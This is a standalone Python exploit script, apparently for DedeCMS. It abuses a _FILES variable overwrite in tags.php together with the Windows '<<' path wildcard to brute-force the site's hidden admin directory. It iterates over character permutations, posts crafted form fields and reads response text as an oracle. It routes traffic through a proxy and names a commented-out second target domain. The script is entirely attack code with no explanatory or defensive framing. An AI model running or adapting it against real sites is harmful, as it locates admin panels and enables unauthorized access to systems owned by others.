#!/usr/bin/env python
 
import requests,time
import itertools
characters = "abcdefghijklmnopqrstuvwxyz0123456789_"
back_dir = ""
flag = 0
proxy='127.0.0.1:8888'
#proxy=['116.196.90.176:3128','121.17.174.121:9797',58.253.154.192:9999,]
proxies={
    'http':'http://'+proxy,
    'https':'https://'+proxy,
}
# url = "http://daan.vu8o.com/tags.php"
url = "http://www.dede.com/tags.php"
data = {
    # "_FILES[mochazz][tmp_name]" : "./{p}<</images/adminico.gif",
    "_FILES[mochazz][tmp_name]" : "D:\wamp64\www\dede\admin\images\allbg.gif",
    "_FILES[mochazz][name]" : 11,
    "_FILES[mochazz][size]" : 11,
    "_FILES[mochazz][type]" : "image/gif"
}
 
for num in range(1,7):
    if flag:
        break
    for pre in itertools.permutations(characters,num):
        pre = ''.join(list(pre))
        data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=pre)
        print("testing",pre)
        # time.sleep(3)
        r = requests.post(url,data=data,proxies=proxies)
        print(r.text)
        if "Not Admin Upload filetype not allow !" not in r.text and r.status_code == 200:
            print("文件不让上传")
            flag = 1
            back_dir = pre
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
            break
        else:
            print("存在文件不上传信息")
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
print("[+] pre:",back_dir)
flag = 0
for i in range(30):
    if flag:
        break
    for ch in characters:
        if ch == characters[-1]:
            flag = 1
            break
        data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=back_dir+ch)
        #time.sleep(0.2)
        r = requests.post(url, data=data,proxies=proxies)
        if "Not Admin Upload filetype not allow !" not in r.text and r.status_code == 200:
            print("wfjm文件不让上传====")
            back_dir += ch
            print("[+] ",back_dir)
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
            break
        else:
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
 
print("admin url:",back_dir)